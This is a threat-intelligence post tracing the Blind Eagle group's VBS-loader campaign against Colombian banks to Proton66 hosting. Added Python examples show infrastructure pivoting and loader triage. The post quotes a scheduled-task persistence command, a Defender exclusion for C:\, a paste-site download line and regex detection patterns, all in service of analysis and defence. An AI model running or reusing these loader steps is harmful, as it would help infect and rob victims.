
Tracing Blind Eagle to Proton66

Trustwave SpiderLabs has assessed with high confidence that the threat group Blind Eagle, aka APT-C-36, is associated with the Russian bulletproof hosting service provider Proton66. Blind Eagle is a threat actor actively targeting organizations across Latin America, with a notable focus on Colombian financial institutions.

Trustwave SpiderLabs, which has been tracking Proton66 for the last several months, was able to make this connection by pivoting from Proton66-linked assets, which led to the identification of another active threat cluster relying on the same ASN infrastructure.

Pivoting identified what is assessed to be one of the group's most recent and operationally active infrastructure clusters, characterized by strong interconnections across multiple domains and IP address groups. This infrastructure exclusively leverages Visual Basic Script (VBS) files as its initial attack vector, relies heavily on free Dynamic DNS (DDNS) services, and deploys readily available Remote Access Trojans (RATs) as second-stage malware.

The starting pivot point for this analysis within Proton66 OOO infrastructure was a set of domains following a common naming pattern that began appearing in summer 2024. These domains all resolved to the IP address 45.135.232[.]38, which is part of a netblock associated with Proton66 OOO.

Figure 1. DuckDNS.org domain registrations with a similar naming pattern, starting on August 12, 2024.
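The pivot described above (a seed IP in a Proton66 netblock, the DDNS domains that resolve to it, and the shared certificates and naming patterns that tie further hosts to the same cluster) can be reproduced over ordinary passive DNS and certificate-sighting data. The Python below is an added example and is not Trustwave's tooling or data: only the seed IP 45.135.232.38 comes from the post, while every domain, the second IP, and the certificate fingerprints are constructed placeholders. It builds an undirected graph over domain, IP and certificate nodes and walks outward from the seed, which is how SSL certificate reuse and consistent naming, both noted later in the post, pull a second IP cluster into the same infrastructure picture.

```python
from collections import defaultdict, deque

# Constructed observation records (passive DNS resolutions plus the TLS certificate seen
# on each host). Only 45.135.232.38 is from the post; everything else is a placeholder.
OBSERVATIONS = [
    {"domain": "sample-lure01.duckdns.org", "ip": "45.135.232.38", "cert": "CERT-PLACEHOLDER-A"},
    {"domain": "sample-lure02.duckdns.org", "ip": "45.135.232.38", "cert": "CERT-PLACEHOLDER-A"},
    {"domain": "sample-lure07.duckdns.org", "ip": "45.135.232.38", "cert": None},
    # The same certificate reused on another host: the link that brings in a second IP.
    {"domain": "sample-panel.duckdns.org", "ip": "192.0.2.10", "cert": "CERT-PLACEHOLDER-A"},
    {"domain": "sample-drop3.ddns.net", "ip": "192.0.2.10", "cert": "CERT-PLACEHOLDER-B"},
    # Unrelated record that shares nothing with the cluster and must not be pulled in.
    {"domain": "unrelated.example.net", "ip": "198.51.100.5", "cert": "CERT-PLACEHOLDER-Z"},
]


def build_graph(records):
    """Undirected graph whose nodes are (kind, value) for domains, IPs and cert fingerprints."""
    graph = defaultdict(set)
    for rec in records:
        nodes = [("domain", rec["domain"]), ("ip", rec["ip"])]
        if rec.get("cert"):
            nodes.append(("cert", rec["cert"]))
        for a in nodes:
            for b in nodes:
                if a != b:
                    graph[a].add(b)
    return graph


def pivot(records, seed_ip, max_hops=4):
    """Breadth-first walk from the seed IP; returns each reached node with the hop it appeared at."""
    graph = build_graph(records)
    start = ("ip", seed_ip)
    hops = {start: 0}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if hops[node] >= max_hops:
            continue  # bound the walk so one shared CDN cert cannot swallow the internet
        for nxt in graph[node]:
            if nxt not in hops:
                hops[nxt] = hops[node] + 1
                queue.append(nxt)
    return hops


def naming_stems(domains):
    """Group hostnames by the first label with trailing digits removed (the naming-pattern pivot)."""
    groups = defaultdict(list)
    for dom in domains:
        stem = dom.split(".")[0].rstrip("0123456789")
        groups[stem].append(dom)
    return dict(groups)


def summarize(records, seed_ip):
    """Cluster membership reachable from the seed, split by node kind, plus naming stems."""
    hops = pivot(records, seed_ip)
    domains = sorted(v for (kind, v) in hops if kind == "domain")
    ips = sorted(v for (kind, v) in hops if kind == "ip")
    certs = sorted(v for (kind, v) in hops if kind == "cert")
    return {"domains": domains, "ips": ips, "certs": certs,
            "stems": naming_stems(domains), "max_hop": max(hops.values())}


if __name__ == "__main__":
    for key, value in summarize(OBSERVATIONS, "45.135.232.38").items():
        print(f"{key}: {value}")
```

With real data the records would come from a passive DNS provider and a certificate transparency or scan source; the hop bound matters there, because a certificate shared by a hosting provider's default page would otherwise connect every tenant of that provider into one cluster.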

The domains in question were used to host a variety of malicious content, including phishing pages and VBS scripts that serve as the initial stage of malware deployment. These scripts act as loaders for second-stage tools, which, in this campaign, are limited to publicly available and often open-source RATs. Notably, an analysis of some of the VBS codes also revealed overlaps with previously analyzed samples generated by Vbs-Crypter, linked to “Crypters and Tools” – a subscription-based service. This crypter is commonly used to obfuscate and pack VBS payloads, hindering static detection. The presence of such artifacts suggests that the threat actors behind this campaign leveraged the service to generate their loaders.

Figure 2. “Crypters And Tools” Telegram advertisement.

Despite the potentially high-value targeting, there is little evidence that the threat actors made a concerted effort to obscure their infrastructure. On the contrary, numerous open directories (opendirs) were discovered throughout the infrastructure, many of which hosted identical malicious files. In some of the more egregious cases, these directories contain complete phishing pages impersonating legitimate Colombian banks and financial institutions, along with first-stage malware designed to initiate the infection. In one of the identified clusters, the threat actors created phishing pages designed to impersonate several well-known Colombian financial institutions, including Bancolombia, BBVA, Banco Caja Social, and Davivienda.

Figure 3. Bancolombia phishing page.

Figure 4. Davivienda phishing page.

These phishing sites were designed to harvest user credentials and other sensitive information. The sites include HTML, CSS, and image files that replicate the appearance of legitimate banking login portals. In addition to the phishing pages, this specific set of infrastructure also hosted various VBS scripts that serve as the first stage of malware deployment. Notably identified samples include download-and-run scripts that retrieve encrypted executable files from a remote server.

Figure 5. Code example that checks whether the VBS file is running with admin privileges and, if not, uses Windows scripting methods to re-execute itself with elevated permissions. Upon successful escalation, it adds an exclusion for the entire C:\ drive in Defender.

Figure 6. Code example that deletes Windows Registry keys related to COM/ActiveX classes (Software\Classes), component identifiers (CLSID) and WOW6432Node paths, as a cleanup step.

While some scripts serve a distinct, narrow purpose, the majority act solely as first-stage loaders for the same selection of commodity second-stage RATs and follow the same pattern. After stripping the 6,000 to 20,000 lines that mostly consist of comments, the first part of most samples creates a scheduled task:

Figure 7. The command "schtasks /create /tn coJb /tr "%TEMP%\GLPd.vbs" /sc minute /mo 1" as found in one of the VBS samples.


The second part decodes a Base64 string, which is then executed via PowerShell:

Figure 8. Deobfuscated and decoded example.

It then downloads the next payload from resources such as paste.ee, textbin.net, or store3.gofile.io, or directly from an IPv4 address:

Figure 9. Examples with hxxps://paste[.]ee/r/jNJfecjT/0, hosted on hxxps://textbin[.]net/raw/xsi2eulwpw.

The next payload is typically a file with an MZ header that is saved under a different name, in this case dll02.txt. It is a DLL that loads the final payload, which is downloaded from another URL as a further Base64 string that also decodes to an MZ file. The pattern concludes with the final payload, which for this specific cluster is either Remcos or AsyncRAT, used to establish command and control (C2) with the management panel.

Figure 10. Deobfuscated example.
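The loader pattern described across Figures 5 to 10 (thousands of comment lines as padding, a scheduled task that re-runs a .vbs from %TEMP% every minute, a Base64 string handed to PowerShell, a paste-site download, and a further Base64 string that decodes to an MZ file) lends itself to a static triage script. The Python below is an added example, not code from Trustwave or from the samples. It runs over a constructed, inert stand-in for a stripped loader: the scheduled-task line and the paste.ee URL are the ones quoted in the post, while the PowerShell line, the registry GUID and the MZ blob are placeholders built in the code. Nothing in the stand-in is executed; the script only strips comments, decodes Base64 runs, and reports which indicators are present.

```python
import base64
import json
import re

# Long Base64 runs: the PowerShell stage and the "MZ" payload both appear this way.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

# Persistence pattern from Figure 7: a task that re-runs a .vbs from %TEMP% every minute.
SCHTASKS = re.compile(
    r'schtasks\s+/create\s+/tn\s+(\S+)\s+/tr\s+"*([^"\s]+\.vbs)"*.*?/sc\s+minute', re.I)

INDICATORS = {
    "scheduled_task_minute_vbs": SCHTASKS,
    # Figure 5: Defender exclusion for the whole C:\ drive after self-elevation.
    "defender_exclusion_root": re.compile(r'Add-MpPreference\s+-ExclusionPath\s+[\'"]?C:\\', re.I),
    # Figure 6: cleanup of COM class, CLSID and WOW6432Node registry keys.
    "com_registry_cleanup": re.compile(r"Software\\Classes|\\CLSID\\|WOW6432Node", re.I),
    # Figure 8: a Base64 string handed to PowerShell.
    "powershell_encoded": re.compile(r"powershell\b[^\n]*?\s-(?:e|enc|encodedcommand)\s", re.I),
    # Figure 9: paste-site hosting for the next stage, defanged or not.
    "paste_site_url": re.compile(r"paste\[?\.\]?ee|textbin\[?\.\]?net|gofile\[?\.\]?io", re.I),
}


def strip_vbs_comments(text: str) -> str:
    """Drop full-line ' and Rem comments, which make up most of a 6,000-20,000 line sample."""
    kept = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("'") or s.lower().startswith("rem "):
            continue
        kept.append(line)
    return "\n".join(kept)


def decode_b64_runs(text: str):
    """Yield the decoded bytes of every long Base64 run that decodes cleanly."""
    for m in B64_RUN.finditer(text):
        run = m.group(0)
        try:
            yield base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue


def as_text(raw: bytes) -> str:
    """PowerShell -e payloads are UTF-16LE; other Base64 strings are usually ASCII."""
    try:
        return raw.decode("utf-16-le") if b"\x00" in raw[1:4] else raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("latin-1")


def triage_vbs(text: str) -> dict:
    """Strip padding, decode embedded Base64 and report which loader indicators are present."""
    code = strip_vbs_comments(text)
    decoded = list(decode_b64_runs(code))
    pe_blobs = [raw for raw in decoded if raw.startswith(b"MZ")]
    # Search the code plus every decoded non-PE blob, so indicators hidden in Base64 count too.
    haystack = "\n".join([code] + [as_text(raw) for raw in decoded if not raw.startswith(b"MZ")])
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    task = SCHTASKS.search(code)
    return {
        "stripped_lines": len(code.splitlines()),
        "indicators": hits,
        "embedded_pe_count": len(pe_blobs),
        "task": {"name": task.group(1), "path": task.group(2)} if task else None,
        "score": len(hits) + (1 if pe_blobs else 0),
    }


def build_sample() -> str:
    """Constructed stand-in for a stripped loader: indicator strings as inert text, never executed."""
    ps_line = "Invoke-WebRequest hxxps://paste[.]ee/r/jNJfecjT/0 -OutFile $env:TEMP\\dll02.txt"
    ps_b64 = base64.b64encode(ps_line.encode("utf-16-le")).decode()
    fake_pe = base64.b64encode(
        b"MZ\x90\x00" + bytes(60) + b"This program cannot be run in DOS mode.").decode()
    lines = [
        "' ---- real samples pad the file with thousands of comment lines like this ----",
        "Rem more filler",
        'Set sh = CreateObject("WScript.Shell")',
        'sh.Run "schtasks /create /tn coJb /tr ""%TEMP%\\GLPd.vbs"" /sc minute /mo 1", 0',
        f'sh.Run "powershell -w hidden -e {ps_b64}", 0',
        "sh.Run \"powershell Add-MpPreference -ExclusionPath 'C:\\'\", 0",
        'sh.RegDelete "HKCU\\Software\\Classes\\CLSID\\{PLACEHOLDER-GUID}\\"',
        f'blob = "{fake_pe}"  \' stands in for the downloaded dll02.txt content',
    ]
    return "\n".join(lines)


if __name__ == "__main__":
    print(json.dumps(triage_vbs(build_sample()), indent=2))
```

The paste-site indicator only fires because the decoded PowerShell text is added to the search set; on the raw script it would be missed, which is the practical reason to decode before matching. Samples that assemble the Base64 blob from concatenated string fragments would need the fragments joined first, which this triage does not attempt.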

In one observed case, such a web-based botnet panel featured a user interface written in Brazilian Portuguese and included a fully functional dashboard used to manage compromised hosts. This panel contained victim logs, deployment paths for initial-stage droppers, and links to the same publicly accessible, open-source RAT payloads, specifically AsyncRAT variants.

Figure 11. Botnet panel dashboard showing a list of infected machines (264 at the time of analysis, primarily based in Argentina) and four buttons/options in the last column to manage them.

The botnet management interface allows operators to control infected machines, retrieve exfiltrated data, and interact with infected endpoints through a broad set of capabilities typically found in commodity RAT management suites.

Figures 12 and 13. Contextual control options displayed after selecting an individual victim within the botnet panel interface, showing the range of post-compromise actions available to the operator, including command execution, file exfiltration, and payload deployment from a specified URL.

The level of access provided through the exposed botnet panel illustrates the operational simplicity of the campaign and reinforces how little emphasis the threat actors placed on infrastructure compartmentalization or concealment, a clear sign of prioritizing rapid deployment and accessibility over stealth or long-term sustainability. Each component of the infrastructure, including malware hosting servers, C2 panels, and phishing-related files, is hosted on domains that exhibit consistent naming patterns, SSL certificate reuse, and shared artifacts. Whether due to oversight or intent, many components, including the C2 panel and VBS files shown above, were publicly accessible via open directories and lacked basic segmentation.

This ongoing activity underscores how unsophisticated threat infrastructures can still result in successful compromises, particularly when paired with phishing lures tailored to specific regional targets. While Colombian financial institutions remain a primary focus, the broader pattern suggests an increasing capability to scale operations across the Latin American (LATAM) region.

Organizations in LATAM, especially within the financial sector, should maintain heightened vigilance around banking-themed emails, enforce robust email filtering, and regularly train staff to identify localized phishing techniques. Organizations can also benefit from using advanced email filtering solutions like Trustwave MailMarshal to detect and block malicious emails that may contain harmful attachments or links. Proactive monitoring for regionally targeted infrastructure and threat indicators can significantly reduce the risk of compromise.

 

IoC

[IoC table: published as three images; not recoverable as text from this page]

About the Author

Serhii Melnyk is a Cyber Threat Intelligence Analyst. Serhii joined Trustwave in 2023 and has a total of eight years in the industry. Among his many tasks at Trustwave, he actively contributes to the MISP project and MITRE ATT&CK. Follow Serhii on LinkedIn.
